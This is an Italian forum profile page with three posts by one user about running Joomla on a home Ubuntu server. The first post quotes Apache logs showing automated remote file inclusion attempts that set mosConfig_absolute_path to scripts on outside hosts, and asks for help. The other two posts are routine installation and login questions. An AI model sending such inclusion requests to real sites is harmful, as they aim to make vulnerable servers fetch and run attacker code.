Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Topics - marcogastaldello

Pagine: [1]
1
Joomla o  apache2 sotto attacco??

salve a tutti, ho creato un mio sito personale sul mio Ubuntu Hardy con apache2-php(Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch)-mysql e joomla (Versione di Joomla!: Joomla! 1.5.1 Production/Stable [ Seenu ] 8-February-2008 22:00 GMT ).

negli ultimi giorni trovo strani collegamenti da vari ip americani nel log di apache:

ecco uno dei tanti dall'access.log:
<206.53.51.240 - - [22/Jun/2008:20:14:41 +0200] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 369 "-" "libwww-perl/5.812">

e il corrispondente nell'error.log:
[Sun Jun 22 20:14:41 2008] [error] [client 206.53.51.240] File does not exist: /var/www/com_directory

ecco un'altro in access.log:
<91.186.11.35 - - [22/Jun/2008:18:38:29 +0200] "GET /joomla/index.php/tips-a-...sl-su-linux-kubuntuubuntu/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 404 1459 "-" "libwww-perl/5.812"
91.186.11.35 - - [22/Jun/2008:18:38:30 +0200] "GET /////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 1754 "-" "libwww-perl/5.812"
91.186.11.35 - - [22/Jun/2008:18:38:30 +0200] "GET /joomla/index.php/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 45596 "-" "libwww-perl/5.812"
89.248.101.69 - - [22/Jun/2008:18:39:58 +0200] "GET //index.php?mosConfig_absolute_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 200 1754 "-" "libwww-perl/5.803"
72.232.217.138 - - [22/Jun/2008:18:40:47 +0200] "GET /joomla/index.php/tips-a-...sl-su-linux-kubuntuubuntu/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 404 1459 "-" "libwww-perl/5.810"
72.232.217.138 - - [22/Jun/2008:18:40:48 +0200] "GET /////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 1754 "-" "libwww-perl/5.810"
72.232.217.138 - - [22/Jun/2008:18:40:48 +0200] "GET /joomla/index.php/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 45596 "-" "libwww-perl/5.810"
91.186.11.35 - - [22/Jun/2008:19:09:33 +0200] "GET /joomla/index.php/tips-a-...sl-su-linux-kubuntuubuntu/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 404 1459 "-" "libwww-perl/5.812"
91.186.11.35 - - [22/Jun/2008:19:09:33 +0200] "GET /////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 1754 "-" "libwww-perl/5.812"
91.186.11.35 - - [22/Jun/2008:19:09:33 +0200] "GET /joomla/index.php/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 45612 "-" "libwww-perl/5.812"
72.232.217.138 - - [22/Jun/2008:19:13:41 +0200] "GET /joomla/index.php/tips-a-...sl-su-linux-kubuntuubuntu/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 404 1459 "-" "libwww-perl/5.810"
72.232.217.138 - - [22/Jun/2008:19:13:42 +0200] "GET /////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 1754 "-" "libwww-perl/5.810"
72.232.217.138 - - [22/Jun/2008:19:13:42 +0200] "GET /joomla/index.php/////?mosConfig_absolute_path=http://www.countryhack.altervista.org/text.txt? HTTP/1.1" 200 45612 "-" "libwww-perl/5.810">



e gli ultimi presunti attacchi:

209.85.100.3 - - [07/Jul/2008:17:44:55 +0200] "GET /joomla/index.php/fantasc...a/49-fondazione-anno-zero/////?mosConfig_absolute_path=http://www.vauenglishclub.com/modules/Forums/admin/.../.knowledge/.../index.txt? HTTP/1.1" 404 1459 "-" "libwww-perl/5.811"
209.85.100.3 - - [07/Jul/2008:17:44:56 +0200] "GET /////?mosConfig_absolute_path=http://www.vauenglishclub.com/modules/Forums/admin/.../.knowledge/.../index.txt? HTTP/1.1" 200 1754 "-" "libwww-perl/5.811"
209.85.100.3 - - [07/Jul/2008:17:44:57 +0200] "GET /joomla/index.php/fantasc...a/////?mosConfig_absolute_path=http://www.vauenglishclub.com/modules/Forums/admin/.../.knowledge/.../index.txt? HTTP/1.1" 404 1459 "-" "libwww-perl/5.811"


e il corrispondente error.log:
<
[Sun Jun 22 18:38:30 2008] [error] [client 91.186.11.35] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 18:38:30 2008] [error] [client 91.186.11.35] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 18:40:48 2008] [error] [client 72.232.217.138] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 18:40:48 2008] [error] [client 72.232.217.138] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 19:09:33 2008] [error] [client 91.186.11.35] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 19:09:33 2008] [error] [client 91.186.11.35] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 19:13:42 2008] [error] [client 72.232.217.138] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
[Sun Jun 22 19:13:42 2008] [error] [client 72.232.217.138] Negotiation: discovered file(s) matching request: /var/www/index.html (None could be negotiated).
>


Da quello che riesco a capire stanno cercando di usare il mio pc e il mio server apache-joomla per attaccare altri siti, sbaglio?

dall'access.log dove c': 404 369 sembrerebbe che abbia bloccato la cosa ma dove d' ad esempio "200 1754" cosa ha fatto?
dall'error.log credo li abbia bloccati, ho ragione?

o meglio se chiudo la porta 80? :'( :'(

Un problema di Joomla mi debbo preoccupare? Blocco il sito o se preoccupante c' un modo per risolvere? :( >:(

Grazie mille a tutti quelli che mi risponderanno! :)

2
ciao a tutti ho installato senza grossi problemi joomla sul mio server LAMP personale(il mio pc) ma quando provo ad entrare da amministratore da un pc che non sia nella mia rete casalinga ottengo un messaggio di errore: username, Password o livello di accesso non corretti. Si prega di riprovare.
 >:(

Il server : Linux Kubuntu Feisty - Apache2 - php5 - joomla 1.0

La cosa non mi preoccupa pi di tanto visto che il sito nel mio pc comunque certe volte vorrei entrare dal pc del lavoro che avendo ip fisso ha diritti totali sul firewall, quindi non pu dipendere da quello.

Grazie a tutti e se qualcuno vuol contribuire con degli articoli (tips & tricks su Linuk e Windows, Astronomia e molto altro) sul mio sito il link :
http://marcogastaldello.no-ip.org

3
ho installato joomla in locale sul mio server ubuntu
e tutti i passi sono andati ok (anche la fase di controllo dei permessi era ok, tutto verde),

ma alla fine ho ottenuto il messaggio:
Il vostro file di configurazione o la cartella che lo contiene non sono scrivibili, o ci sono dei problemi nella creazione del file di configurazione. Dovete adesso caricare il seguente codice a mano. Cliccare sulla textarea per evidenziare tutto il codice.

 ??? ??? ??? :-[ :'( :o

ho copiato il codice e l'ho sostituito a quello esistente nel file:
configuration.php-dist
il file giusto? Non c' scritto da nessuna parte quale sia il file :( :'(


e come richiesto dalla scritta rossa in alto ho cancellato la cartella:
installation

ma ora se digito nel browser:
http://localhost/joomla/

ottengo solo la pagina di apache con la lista delle cartelle e dei file ??? :'(

qualcuno pu aiutarmi? cosa ho sbagliato?

p.s. se clicco sul pulsante: vai sito o amministratore in alto a dx alla fine dell'installazione dove compare il messaggio mi fa ricominciare il setup!

la versione di joomla : Joomla_1013b_stabile_ita


Pagine: [1]
Host

Torna su